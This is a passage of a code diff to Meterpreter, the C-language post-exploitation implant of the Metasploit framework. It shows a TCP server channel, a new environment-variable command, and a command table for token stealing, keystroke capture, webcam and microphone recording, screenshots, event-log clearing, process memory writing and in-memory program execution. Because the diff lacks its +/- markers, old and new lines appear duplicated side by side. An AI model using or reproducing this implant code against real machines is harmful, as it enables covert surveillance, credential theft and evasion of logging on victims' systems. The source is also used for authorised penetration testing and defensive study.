}
dprintf("[TCP-SERVER] Failed to bind to %s, trying 0.0.0.0 ...", lhost);
// try again, but this time bind to any/all interfaces.
lhost = "0.0.0.0";
saddr.sin_addr.s_addr = inet_addr(lhost);
if (bind(ctx->fd, (SOCKADDR *)&saddr, sizeof(SOCKADDR_IN)) == SOCKET_ERROR)
{
BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. bind failed");
}
dwResult = ERROR_SUCCESS;
}
if (listen(ctx->fd, SOMAXCONN) == SOCKET_ERROR)
{
BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. listen failed");
}
if( listen( ctx->fd, SOMAXCONN ) == SOCKET_ERROR )
BREAK_ON_WSAERROR( "[TCP-SERVER] request_net_tcp_server_channel_open. listen failed" );
ctx->notify = WSACreateEvent();
if( ctx->notify == WSA_INVALID_EVENT )
BREAK_ON_WSAERROR( "[TCP-SERVER] request_net_tcp_server_channel_open. WSACreateEvent failed" );
if (ctx->notify == WSA_INVALID_EVENT)
{
BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSACreateEvent failed");
}
if( WSAEventSelect( ctx->fd, ctx->notify, FD_ACCEPT ) == SOCKET_ERROR )
BREAK_ON_WSAERROR( "[TCP-SERVER] request_net_tcp_server_channel_open. WSAEventSelect failed" );
if (WSAEventSelect(ctx->fd, ctx->notify, FD_ACCEPT) == SOCKET_ERROR)
{
BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSAEventSelect failed");
}
memset( &chops, 0, sizeof(StreamChannelOps) );
memset(&chops, 0, sizeof(StreamChannelOps));
chops.native.context = ctx;
chops.native.close = tcp_channel_server_close;
chops.native.close = tcp_channel_server_close;
ctx->channel = channel_create_stream( 0, CHANNEL_FLAG_SYNCHRONOUS, &chops );
if( !ctx->channel )
BREAK_WITH_ERROR( "[TCP-SERVER] request_net_tcp_server_channel_open. channel_create_stream failed", ERROR_INVALID_HANDLE );
ctx->channel = channel_create_stream(0, CHANNEL_FLAG_SYNCHRONOUS, &chops);
if (!ctx->channel)
{
BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. channel_create_stream failed", ERROR_INVALID_HANDLE);
}
scheduler_insert_waitable( ctx->notify, ctx, NULL, (WaitableNotifyRoutine)tcp_channel_server_notify, NULL );
scheduler_insert_waitable(ctx->notify, ctx, NULL, (WaitableNotifyRoutine)tcp_channel_server_notify, NULL);
packet_add_tlv_uint( response, TLV_TYPE_CHANNEL_ID, channel_get_id(ctx->channel) );
packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channel_get_id(ctx->channel));
dprintf( "[TCP-SERVER] request_net_tcp_server_channel_open. tcp server %s:%d on channel %d", lhost, lport, channel_get_id(ctx->channel) );
dprintf("[TCP-SERVER] request_net_tcp_server_channel_open. tcp server %s:%d on channel %d", lhost, lport, channel_get_id(ctx->channel));
} while( 0 );
} while (0);
packet_transmit_response( dwResult, remote, response );
packet_transmit_response(dwResult, remote, response);
do
{
if( dwResult == ERROR_SUCCESS )
if (dwResult == ERROR_SUCCESS)
{
break;
}
if( !ctx )
dprintf("[TCP-SERVER] Error encountered %u 0x%x", dwResult, dwResult);
if (!ctx)
{
break;
}
if( ctx->fd )
closesocket( ctx->fd );
if( ctx->channel )
channel_destroy( ctx->channel, packet );
if (ctx->fd)
{
dprintf("[TCP-SERVER] Destroying socket");
closesocket(ctx->fd);
}
free( ctx );
if (ctx->channel)
{
dprintf("[TCP-SERVER] Destroying channel");
channel_destroy(ctx->channel, packet);
}
} while( 0 );
free(ctx);
return ERROR_SUCCESS;
} while (0);
return dwResult;
}

18
c/meterpreter/source/extensions/stdapi/server/precomp.h
View File

@ -39,16 +39,16 @@
#define WSAECONNABORTED ECONNABORTED
#define BREAK_WITH_ERROR(format, args...) \
do { \
{ \
dprintf(format, ## args); \
exit(0); \
} while(0) \
break; \
} \
#define BREAK_ON_WSAERROR(format, args...) \
do { \
{ \
dprintf(format, ## args); \
abort(); \
} while(0) \
break; \
} \
#define Sleep(x) usleep(x * 1000)
#define WSASocket(a,b,c,d,e,f) socket(a,b,c)
@ -69,9 +69,9 @@
#ifdef _WIN32
#include "railgun/railgun.h" // PKS, win32 specific at the moment.
#include "../../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
#include "../../../ReflectiveDLLInjection/GetProcAddressR.h"
#include "../../../ReflectiveDLLInjection/ReflectiveLoader.h"
#include "../../../DelayLoadMetSrv/DelayLoadMetSrv.h"
#include "../../../ReflectiveDLLInjection/inject/src/GetProcAddressR.h"
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.h"
// declared in ReflectiveLoader.c and set by DllMain also in ReflectiveLoader.c
extern HINSTANCE hAppInstance;
#endif

209
c/meterpreter/source/extensions/stdapi/server/stdapi.c
View File

@ -8,7 +8,7 @@
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#ifdef _WIN32
#include "../../../ReflectiveDLLInjection/ReflectiveLoader.c"
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#endif
// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor
@ -21,150 +21,150 @@ extern DWORD request_general_channel_open(Remote *remote, Packet *packet);
Command customCommands[] =
{
// General
COMMAND_REQ( "core_channel_open", request_general_channel_open ),
COMMAND_REQ("core_channel_open", request_general_channel_open),
#ifdef WIN32
// Railgun
COMMAND_REQ( "stdapi_railgun_api", request_railgun_api ),
COMMAND_REQ( "stdapi_railgun_api_multi", request_railgun_api_multi ),
COMMAND_REQ( "stdapi_railgun_memread", request_railgun_memread ),
COMMAND_REQ( "stdapi_railgun_memwrite", request_railgun_memwrite ),
COMMAND_REQ("stdapi_railgun_api", request_railgun_api),
COMMAND_REQ("stdapi_railgun_api_multi", request_railgun_api_multi),
COMMAND_REQ("stdapi_railgun_memread", request_railgun_memread),
COMMAND_REQ("stdapi_railgun_memwrite", request_railgun_memwrite),
#endif
// Fs
COMMAND_REQ( "stdapi_fs_ls", request_fs_ls ),
COMMAND_REQ( "stdapi_fs_getwd", request_fs_getwd ),
COMMAND_REQ( "stdapi_fs_chdir", request_fs_chdir ),
COMMAND_REQ( "stdapi_fs_mkdir", request_fs_mkdir ),
COMMAND_REQ( "stdapi_fs_delete_dir", request_fs_delete_dir ),
COMMAND_REQ( "stdapi_fs_delete_file", request_fs_delete_file ),
COMMAND_REQ( "stdapi_fs_separator", request_fs_separator ),
COMMAND_REQ( "stdapi_fs_stat", request_fs_stat ),
COMMAND_REQ( "stdapi_fs_file_expand_path", request_fs_file_expand_path ),
COMMAND_REQ( "stdapi_fs_file_move", request_fs_file_move ),
COMMAND_REQ( "stdapi_fs_md5", request_fs_md5 ),
COMMAND_REQ( "stdapi_fs_sha1", request_fs_sha1 ),
COMMAND_REQ("stdapi_fs_ls", request_fs_ls),
COMMAND_REQ("stdapi_fs_getwd", request_fs_getwd),
COMMAND_REQ("stdapi_fs_chdir", request_fs_chdir),
COMMAND_REQ("stdapi_fs_mkdir", request_fs_mkdir),
COMMAND_REQ("stdapi_fs_delete_dir", request_fs_delete_dir),
COMMAND_REQ("stdapi_fs_delete_file", request_fs_delete_file),
COMMAND_REQ("stdapi_fs_separator", request_fs_separator),
COMMAND_REQ("stdapi_fs_stat", request_fs_stat),
COMMAND_REQ("stdapi_fs_file_expand_path", request_fs_file_expand_path),
COMMAND_REQ("stdapi_fs_file_move", request_fs_file_move),
COMMAND_REQ("stdapi_fs_md5", request_fs_md5),
COMMAND_REQ("stdapi_fs_sha1", request_fs_sha1),
#ifdef _WIN32
COMMAND_REQ( "stdapi_fs_search", request_fs_search ),
COMMAND_REQ("stdapi_fs_search", request_fs_search),
#endif
// Process
COMMAND_REQ( "stdapi_sys_process_attach", request_sys_process_attach ),
COMMAND_REQ( "stdapi_sys_process_close", request_sys_process_close ),
COMMAND_REQ( "stdapi_sys_process_execute", request_sys_process_execute ),
COMMAND_REQ( "stdapi_sys_process_kill", request_sys_process_kill ),
COMMAND_REQ( "stdapi_sys_process_get_processes", request_sys_process_get_processes ),
COMMAND_REQ( "stdapi_sys_process_getpid", request_sys_process_getpid ),
COMMAND_REQ( "stdapi_sys_process_get_info", request_sys_process_get_info ),
COMMAND_REQ( "stdapi_sys_process_wait", request_sys_process_wait ),
COMMAND_REQ("stdapi_sys_process_attach", request_sys_process_attach),
COMMAND_REQ("stdapi_sys_process_close", request_sys_process_close),
COMMAND_REQ("stdapi_sys_process_execute", request_sys_process_execute),
COMMAND_REQ("stdapi_sys_process_kill", request_sys_process_kill),
COMMAND_REQ("stdapi_sys_process_get_processes", request_sys_process_get_processes),
COMMAND_REQ("stdapi_sys_process_getpid", request_sys_process_getpid),
COMMAND_REQ("stdapi_sys_process_get_info", request_sys_process_get_info),
COMMAND_REQ("stdapi_sys_process_wait", request_sys_process_wait),
#ifdef _WIN32
// Image
COMMAND_REQ( "stdapi_sys_process_image_load", request_sys_process_image_load ),
COMMAND_REQ( "stdapi_sys_process_image_get_proc_address", request_sys_process_image_get_proc_address ),
COMMAND_REQ( "stdapi_sys_process_image_unload", request_sys_process_image_unload ),
COMMAND_REQ( "stdapi_sys_process_image_get_images", request_sys_process_image_get_images ),
COMMAND_REQ("stdapi_sys_process_image_load", request_sys_process_image_load),
COMMAND_REQ("stdapi_sys_process_image_get_proc_address", request_sys_process_image_get_proc_address),
COMMAND_REQ("stdapi_sys_process_image_unload", request_sys_process_image_unload),
COMMAND_REQ("stdapi_sys_process_image_get_images", request_sys_process_image_get_images),
// Memory
COMMAND_REQ( "stdapi_sys_process_memory_allocate", request_sys_process_memory_allocate ),
COMMAND_REQ( "stdapi_sys_process_memory_free", request_sys_process_memory_free ),
COMMAND_REQ( "stdapi_sys_process_memory_read", request_sys_process_memory_read ),
COMMAND_REQ( "stdapi_sys_process_memory_write", request_sys_process_memory_write ),
COMMAND_REQ( "stdapi_sys_process_memory_query", request_sys_process_memory_query ),
COMMAND_REQ( "stdapi_sys_process_memory_protect", request_sys_process_memory_protect ),
COMMAND_REQ( "stdapi_sys_process_memory_lock", request_sys_process_memory_lock ),
COMMAND_REQ( "stdapi_sys_process_memory_unlock", request_sys_process_memory_unlock ),
COMMAND_REQ("stdapi_sys_process_memory_allocate", request_sys_process_memory_allocate),
COMMAND_REQ("stdapi_sys_process_memory_free", request_sys_process_memory_free),
COMMAND_REQ("stdapi_sys_process_memory_read", request_sys_process_memory_read),
COMMAND_REQ("stdapi_sys_process_memory_write", request_sys_process_memory_write),
COMMAND_REQ("stdapi_sys_process_memory_query", request_sys_process_memory_query),
COMMAND_REQ("stdapi_sys_process_memory_protect", request_sys_process_memory_protect),
COMMAND_REQ("stdapi_sys_process_memory_lock", request_sys_process_memory_lock),
COMMAND_REQ("stdapi_sys_process_memory_unlock", request_sys_process_memory_unlock),
// Thread
COMMAND_REQ( "stdapi_sys_process_thread_open", request_sys_process_thread_open ),
COMMAND_REQ( "stdapi_sys_process_thread_create", request_sys_process_thread_create ),
COMMAND_REQ( "stdapi_sys_process_thread_close", request_sys_process_thread_close ),
COMMAND_REQ( "stdapi_sys_process_thread_get_threads", request_sys_process_thread_get_threads ),
COMMAND_REQ( "stdapi_sys_process_thread_suspend", request_sys_process_thread_suspend ),
COMMAND_REQ( "stdapi_sys_process_thread_resume", request_sys_process_thread_resume ),
COMMAND_REQ( "stdapi_sys_process_thread_terminate", request_sys_process_thread_terminate ),
COMMAND_REQ( "stdapi_sys_process_thread_query_regs", request_sys_process_thread_query_regs ),
COMMAND_REQ( "stdapi_sys_process_thread_set_regs", request_sys_process_thread_set_regs ),
COMMAND_REQ("stdapi_sys_process_thread_open", request_sys_process_thread_open),
COMMAND_REQ("stdapi_sys_process_thread_create", request_sys_process_thread_create),
COMMAND_REQ("stdapi_sys_process_thread_close", request_sys_process_thread_close),
COMMAND_REQ("stdapi_sys_process_thread_get_threads", request_sys_process_thread_get_threads),
COMMAND_REQ("stdapi_sys_process_thread_suspend", request_sys_process_thread_suspend),
COMMAND_REQ("stdapi_sys_process_thread_resume", request_sys_process_thread_resume),
COMMAND_REQ("stdapi_sys_process_thread_terminate", request_sys_process_thread_terminate),
COMMAND_REQ("stdapi_sys_process_thread_query_regs", request_sys_process_thread_query_regs),
COMMAND_REQ("stdapi_sys_process_thread_set_regs", request_sys_process_thread_set_regs),
// Registry
COMMAND_REQ( "stdapi_registry_load_key", request_registry_load_key ),
COMMAND_REQ( "stdapi_registry_unload_key", request_registry_unload_key ),
COMMAND_REQ( "stdapi_registry_open_key", request_registry_open_key ),
COMMAND_REQ( "stdapi_registry_open_remote_key", request_registry_open_remote_key ),
COMMAND_REQ( "stdapi_registry_create_key", request_registry_create_key ),
COMMAND_REQ( "stdapi_registry_enum_key", request_registry_enum_key ),
COMMAND_REQ( "stdapi_registry_delete_key", request_registry_delete_key ),
COMMAND_REQ( "stdapi_registry_close_key", request_registry_close_key ),
COMMAND_REQ( "stdapi_registry_set_value", request_registry_set_value ),
COMMAND_REQ( "stdapi_registry_query_value", request_registry_query_value ),
COMMAND_REQ( "stdapi_registry_query_class", request_registry_query_class ),
COMMAND_REQ( "stdapi_registry_enum_value", request_registry_enum_value ),
COMMAND_REQ( "stdapi_registry_delete_value", request_registry_delete_value ),
COMMAND_REQ("stdapi_registry_check_key_exists", request_registry_check_key_exists),
COMMAND_REQ("stdapi_registry_load_key", request_registry_load_key),
COMMAND_REQ("stdapi_registry_unload_key", request_registry_unload_key),
COMMAND_REQ("stdapi_registry_open_key", request_registry_open_key),
COMMAND_REQ("stdapi_registry_open_remote_key", request_registry_open_remote_key),
COMMAND_REQ("stdapi_registry_create_key", request_registry_create_key),
COMMAND_REQ("stdapi_registry_enum_key", request_registry_enum_key),
COMMAND_REQ("stdapi_registry_delete_key", request_registry_delete_key),
COMMAND_REQ("stdapi_registry_close_key", request_registry_close_key),
COMMAND_REQ("stdapi_registry_set_value", request_registry_set_value),
COMMAND_REQ("stdapi_registry_query_value", request_registry_query_value),
COMMAND_REQ("stdapi_registry_query_class", request_registry_query_class),
COMMAND_REQ("stdapi_registry_enum_value", request_registry_enum_value),
COMMAND_REQ("stdapi_registry_delete_value", request_registry_delete_value),
#endif
// Sys/config
COMMAND_REQ( "stdapi_sys_config_getuid", request_sys_config_getuid ),
COMMAND_REQ( "stdapi_sys_config_sysinfo", request_sys_config_sysinfo ),
COMMAND_REQ( "stdapi_sys_config_rev2self", request_sys_config_rev2self ),
COMMAND_REQ( "stdapi_sys_config_getprivs", request_sys_config_getprivs ),
COMMAND_REQ("stdapi_sys_config_getuid", request_sys_config_getuid),
COMMAND_REQ("stdapi_sys_config_sysinfo", request_sys_config_sysinfo),
COMMAND_REQ("stdapi_sys_config_rev2self", request_sys_config_rev2self),
COMMAND_REQ("stdapi_sys_config_getprivs", request_sys_config_getprivs),
COMMAND_REQ("stdapi_sys_config_getenv", request_sys_config_getenv),
#ifdef _WIN32
COMMAND_REQ( "stdapi_sys_config_steal_token", request_sys_config_steal_token ),
COMMAND_REQ( "stdapi_sys_config_drop_token", request_sys_config_drop_token ),
COMMAND_REQ("stdapi_sys_config_steal_token", request_sys_config_steal_token),
COMMAND_REQ("stdapi_sys_config_drop_token", request_sys_config_drop_token),
#endif
// Net
COMMAND_REQ( "stdapi_net_config_get_routes", request_net_config_get_routes ),
COMMAND_REQ( "stdapi_net_config_add_route", request_net_config_add_route ),
COMMAND_REQ( "stdapi_net_config_remove_route", request_net_config_remove_route ),
COMMAND_REQ( "stdapi_net_config_get_interfaces", request_net_config_get_interfaces ),
COMMAND_REQ( "stdapi_net_config_get_arp_table", request_net_config_get_arp_table ),
COMMAND_REQ( "stdapi_net_config_get_netstat", request_net_config_get_netstat ),
COMMAND_REQ("stdapi_net_config_get_routes", request_net_config_get_routes),
COMMAND_REQ("stdapi_net_config_add_route", request_net_config_add_route),
COMMAND_REQ("stdapi_net_config_remove_route", request_net_config_remove_route),
COMMAND_REQ("stdapi_net_config_get_interfaces", request_net_config_get_interfaces),
COMMAND_REQ("stdapi_net_config_get_arp_table", request_net_config_get_arp_table),
COMMAND_REQ("stdapi_net_config_get_netstat", request_net_config_get_netstat),
#ifdef WIN32
{ "stdapi_net_config_get_proxy",
{ request_net_config_get_proxy_config, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Proxy
COMMAND_REQ("stdapi_net_config_get_proxy", request_net_config_get_proxy_config),
// Resolve
COMMAND_REQ( "stdapi_net_resolve_host", request_resolve_host ),
COMMAND_REQ( "stdapi_net_resolve_hosts", request_resolve_hosts ),
COMMAND_REQ("stdapi_net_resolve_host", request_resolve_host),
COMMAND_REQ("stdapi_net_resolve_hosts", request_resolve_hosts),
#endif
// Socket
COMMAND_REQ( "stdapi_net_socket_tcp_shutdown", request_net_socket_tcp_shutdown ),
COMMAND_REQ("stdapi_net_socket_tcp_shutdown", request_net_socket_tcp_shutdown),
#ifdef _WIN32
// UI
COMMAND_REQ( "stdapi_ui_enable_mouse", request_ui_enable_mouse ),
COMMAND_REQ( "stdapi_ui_enable_keyboard", request_ui_enable_keyboard ),
COMMAND_REQ( "stdapi_ui_get_idle_time", request_ui_get_idle_time ),
COMMAND_REQ( "stdapi_ui_start_keyscan", request_ui_start_keyscan ),
COMMAND_REQ( "stdapi_ui_stop_keyscan", request_ui_stop_keyscan ),
COMMAND_REQ( "stdapi_ui_get_keys", request_ui_get_keys ),
COMMAND_REQ( "stdapi_ui_desktop_enum", request_ui_desktop_enum ),
COMMAND_REQ( "stdapi_ui_desktop_get", request_ui_desktop_get ),
COMMAND_REQ( "stdapi_ui_desktop_set", request_ui_desktop_set ),
COMMAND_REQ( "stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot ),
COMMAND_REQ("stdapi_ui_enable_mouse", request_ui_enable_mouse),
COMMAND_REQ("stdapi_ui_enable_keyboard", request_ui_enable_keyboard),
COMMAND_REQ("stdapi_ui_get_idle_time", request_ui_get_idle_time),
COMMAND_REQ("stdapi_ui_start_keyscan", request_ui_start_keyscan),
COMMAND_REQ("stdapi_ui_stop_keyscan", request_ui_stop_keyscan),
COMMAND_REQ("stdapi_ui_get_keys", request_ui_get_keys),
COMMAND_REQ("stdapi_ui_desktop_enum", request_ui_desktop_enum),
COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get),
COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set),
COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot),
// Event Log
COMMAND_REQ( "stdapi_sys_eventlog_open", request_sys_eventlog_open ),
COMMAND_REQ( "stdapi_sys_eventlog_numrecords", request_sys_eventlog_numrecords ),
COMMAND_REQ( "stdapi_sys_eventlog_read", request_sys_eventlog_read ),
COMMAND_REQ( "stdapi_sys_eventlog_oldest", request_sys_eventlog_oldest ),
COMMAND_REQ( "stdapi_sys_eventlog_clear", request_sys_eventlog_clear ),
COMMAND_REQ( "stdapi_sys_eventlog_close", request_sys_eventlog_close ),
COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open),
COMMAND_REQ("stdapi_sys_eventlog_numrecords", request_sys_eventlog_numrecords),
COMMAND_REQ("stdapi_sys_eventlog_read", request_sys_eventlog_read),
COMMAND_REQ("stdapi_sys_eventlog_oldest", request_sys_eventlog_oldest),
COMMAND_REQ("stdapi_sys_eventlog_clear", request_sys_eventlog_clear),
COMMAND_REQ("stdapi_sys_eventlog_close", request_sys_eventlog_close),
// Power
COMMAND_REQ( "stdapi_sys_power_exitwindows", request_sys_power_exitwindows ),
COMMAND_REQ("stdapi_sys_power_exitwindows", request_sys_power_exitwindows),
// Webcam
COMMAND_REQ( "webcam_list", request_webcam_list ),
COMMAND_REQ( "webcam_start", request_webcam_start ),
COMMAND_REQ( "webcam_get_frame", request_webcam_get_frame ),
COMMAND_REQ( "webcam_stop", request_webcam_stop ),
COMMAND_REQ("webcam_list", request_webcam_list),
COMMAND_REQ("webcam_start", request_webcam_start),
COMMAND_REQ("webcam_get_frame", request_webcam_get_frame),
COMMAND_REQ("webcam_stop", request_webcam_stop),
// Audio
COMMAND_REQ( "webcam_audio_record", request_ui_record_mic ),
COMMAND_REQ("webcam_audio_record", request_ui_record_mic),
#endif
COMMAND_TERMINATOR
@ -182,7 +182,7 @@ DWORD InitServerExtension(Remote *remote)
#ifdef _WIN32
hMetSrv = remote->hMetSrv;
#endif
command_register_all( customCommands );
command_register_all(customCommands);
return ERROR_SUCCESS;
}
@ -196,8 +196,7 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
DWORD DeinitServerExtension(Remote *remote)
#endif
{
command_deregister_all( customCommands );
command_deregister_all(customCommands);
return ERROR_SUCCESS;
}

94
c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
View File

@ -4,6 +4,98 @@
#include <sys/utsname.h>
#endif
/*!
* @brief Add an environment variable / value pair to a response packet.
* @param response The \c Response packet to add the values to.
* @param envVar The name of the environment variable to add.
* @param envVal The value of the environment.
*/
VOID add_env_pair(Packet *response, char * envVar, char *envVal)
{
Tlv entries[2] = { 0 };
if (envVal)
{
entries[0].header.type = TLV_TYPE_ENV_VARIABLE;
entries[0].header.length = (DWORD)strlen(envVar) + 1;
entries[0].buffer = (PUCHAR)envVar;
entries[1].header.type = TLV_TYPE_ENV_VALUE;
entries[1].header.length = (DWORD)strlen(envVal) + 1;
entries[1].buffer = (PUCHAR)envVal;
packet_add_tlv_group(response, TLV_TYPE_ENV_GROUP, entries, 2);
}
else
{
dprintf("[ENV] No value found for %s", envVar);
}
}
/*!
* @brief Expand a given set of environment variables.
* @param remote Pointer to the \c Remote instance making the request.
* @param packet Pointer to the \c Request packet.
* @remarks This will return a hash of the list of environment variables
* and their values, as requested by the caller.
* @returns Indication of success or failure.
*/
DWORD request_sys_config_getenv(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
DWORD dwResult = ERROR_SUCCESS;
DWORD dwTlvIndex = 0;
Tlv envTlv;
char* pEnvVarStart;
char* pEnvVarEnd;
do
{
while (ERROR_SUCCESS == packet_enum_tlv(packet, dwTlvIndex++, TLV_TYPE_ENV_VARIABLE, &envTlv))
{
pEnvVarStart = (char*)envTlv.buffer;
dprintf("[ENV] Processing: %s", pEnvVarStart);
// skip any '%' or '$' if they were specified.
while (*pEnvVarStart != '\0' && (*pEnvVarStart == '$' || *pEnvVarStart == '%'))
{
++pEnvVarStart;
}
dprintf("[ENV] pEnvStart: %s", pEnvVarStart);
pEnvVarEnd = pEnvVarStart;
// if we're on windows, the caller might have passed in '%' at the end, so remove that
// if it's there.
while (*pEnvVarEnd != '\0')
{
if (*pEnvVarEnd == '%')
{
// terminate it here instead
*pEnvVarEnd = '\0';
break;
}
++pEnvVarEnd;
}
dprintf("[ENV] Final env var: %s", pEnvVarStart);
// grab the value of the variable and stick it in the response.
add_env_pair(response, pEnvVarStart, getenv(pEnvVarStart));
dprintf("[ENV] Env var added");
}
} while (0);
dprintf("[ENV] Transmitting response.");
packet_transmit_response(dwResult, remote, response);
dprintf("[ENV] done.");
return dwResult;
}
/*
* sys_getuid
* ----------
@ -28,7 +120,9 @@ DWORD request_sys_config_getuid(Remote *remote, Packet *packet)
do
{
if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, FALSE, &token))
{
OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token);
}
if (!GetTokenInformation(token, TokenUser, TokenUserInfo, 4096, &returned_tokinfo_length))
{

1
c/meterpreter/source/extensions/stdapi/server/sys/config/config.h
View File

@ -1,6 +1,7 @@
#ifndef _METERPRETER_SOURCE_EXTENSION_STDAPI_STDAPI_SERVER_SYS_CONFIG_CONFIG_H
#define _METERPRETER_SOURCE_EXTENSION_STDAPI_STDAPI_SERVER_SYS_CONFIG_CONFIG_H
DWORD request_sys_config_getenv(Remote *remote, Packet *packet);
DWORD request_sys_config_getuid(Remote *remote, Packet *packet);
DWORD request_sys_config_sysinfo(Remote *remote, Packet *packet);
DWORD request_sys_config_rev2self(Remote *remote, Packet *packet);

76
c/meterpreter/source/extensions/stdapi/server/sys/process/process.c
View File

@ -1,7 +1,7 @@
#include "precomp.h"
#include "ps.h" // include the code for listing proceses
#ifdef _WIN32
#ifdef _WIN32
#include "./../session.h"
#include "in-mem-exe.h" /* include skapetastic in-mem exe exec */
@ -10,7 +10,7 @@ typedef BOOL (STDMETHODCALLTYPE FAR * LPFNCREATEENVIRONMENTBLOCK)( LPVOID *lpEn
typedef BOOL (STDMETHODCALLTYPE FAR * LPFNDESTROYENVIRONMENTBLOCK) ( LPVOID lpEnvironment );
typedef BOOL (WINAPI * LPCREATEPROCESSWITHTOKENW)( HANDLE, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION );
#else
#else
#include "linux-in-mem-exe.h"
@ -41,7 +41,7 @@ DWORD request_sys_process_attach(Remote *remote, Packet *packet)
{
BOOLEAN inherit = packet_get_tlv_value_bool(packet,
TLV_TYPE_INHERIT);
DWORD permission = packet_get_tlv_value_uint(packet,
DWORD permission = packet_get_tlv_value_uint(packet,
TLV_TYPE_PROCESS_PERMS);
handle = OpenProcess(permission, inherit, pid);
@ -98,12 +98,12 @@ DWORD request_sys_process_close(Remote *remote, Packet *packet)
int try_open_pty(int *master, int *slave)
{
int lmaster, lslave;
char path[512];
char path[512];
struct termios newtio;
lmaster = open("/dev/ptmx", O_RDWR | O_NOCTTY);
if(lmaster == -1) return -1;
dprintf("master fd is %d", lmaster);
if(grantpt(lmaster) == -1) {
@ -131,7 +131,7 @@ int try_open_pty(int *master, int *slave)
*master = lmaster;
*slave = lslave;
if(tcgetattr(lmaster, &newtio) == -1)
if(tcgetattr(lmaster, &newtio) == -1)
// oh well
return 0;
@ -144,7 +144,7 @@ int try_open_pty(int *master, int *slave)
tcsetattr(lmaster, TCSANOW, &newtio);
return 0;
}
}
#endif
@ -204,7 +204,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
flags = packet_get_tlv_value_uint(packet, TLV_TYPE_PROCESS_FLAGS);
if (packet_get_tlv(packet, TLV_TYPE_VALUE_DATA, &inMemoryData) == ERROR_SUCCESS)
{
{
doInMemory = TRUE;
createFlags |= CREATE_SUSPENDED;
}
@ -230,7 +230,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
} while( 0 );
}
// If the remote endpoint provided arguments, combine them with the
// If the remote endpoint provided arguments, combine them with the
// executable to produce a command line
if (path && arguments)
{
@ -556,7 +556,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
}
// check for failure here otherwise we can get a case where we
// check for failure here otherwise we can get a case where we
// failed but return a process id and this will throw off the ruby side.
if( result == ERROR_SUCCESS )
{
@ -625,14 +625,14 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
dprintf("path: %s, arguments: %s\n", path ? path : "(null)", arguments ? arguments : "(null)");
if (packet_get_tlv(packet, TLV_TYPE_VALUE_DATA, &inMemoryData) == ERROR_SUCCESS)
{
{
doInMemory = TRUE;
}
// how to handle a single string argument line? we don't have a lexer/parser to
// correctly handle stuff like quotes, etc. could dumbly parse on white space to
// build arguments for execve. revert to /bin/sh -c style execution?
// XXX.. don't feel like messing with it atm
// correctly handle stuff like quotes, etc. could dumbly parse on white space to
// build arguments for execve. revert to /bin/sh -c style execution?
// XXX.. don't feel like messing with it atm
idx = 0;
if(arguments) {
@ -650,7 +650,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
path = "/bin/sh";
} else {
argv[idx++] = path;
}
}
argv[idx++] = NULL;
//for (i = 0; i < idx; i++) {
@ -700,7 +700,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
} else {
// fall back to pipes if there is no tty
// Allocate the stdin and stdout pipes
if(pipe(&in) || pipe(&out))
if(pipe(&in) || pipe(&out))
{
channel_destroy(newChannel, NULL);
@ -728,7 +728,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
if( (devnull = open("/dev/null", O_RDONLY) ) == -1) {
// XXX This is possible, due to chroots etc. We could close
// fd 0/1/2 and hope the program isn't buggy.
result = GetLastError();
break;
}
@ -750,8 +750,8 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
case 0:
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED)
{
if(have_pty)
{
if(have_pty)
{
dup2(slave, 0);
dup2(slave, 1);
dup2(slave, 2);
@ -767,7 +767,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
}
for(i = 3; i < 1024; i++) close(i);
if(doInMemory)
if(doInMemory)
{
int found;
Elf32_Ehdr *ehdr = (Elf32_Ehdr *)inMemoryData.buffer;
@ -779,7 +779,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
break;
}
}
if(! found) return; // XXX, not too much we can do in this case ?
perform_in_mem_exe(argv, environ, inMemoryData.buffer, inMemoryData.header.length, phdr->p_vaddr & ~4095, ehdr->e_entry);
@ -829,13 +829,13 @@ DWORD request_sys_process_kill(Remote *remote, Packet *packet)
DWORD index = 0;
while ((packet_enum_tlv(packet, index++, TLV_TYPE_PID,
&pidTlv) == ERROR_SUCCESS) &&
&pidTlv) == ERROR_SUCCESS) &&
(pidTlv.header.length >= sizeof(DWORD)))
{
DWORD pid = ntohl(*(LPDWORD)pidTlv.buffer);
HANDLE h = NULL;
#ifdef _WIN32
#ifdef _WIN32
// Try to attach to the process
if (!(h = OpenProcess(PROCESS_TERMINATE, FALSE, pid)))
{
